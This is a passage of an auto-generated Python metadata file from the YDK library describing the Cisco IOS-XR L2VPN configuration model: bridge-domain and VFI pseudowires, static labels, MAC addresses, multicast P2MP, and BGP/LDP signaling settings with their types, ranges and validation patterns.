'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
''' List of pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' Two byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable LDP as Signaling Protocol
.Deletion of this object also causes
deletion of all objects under
LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
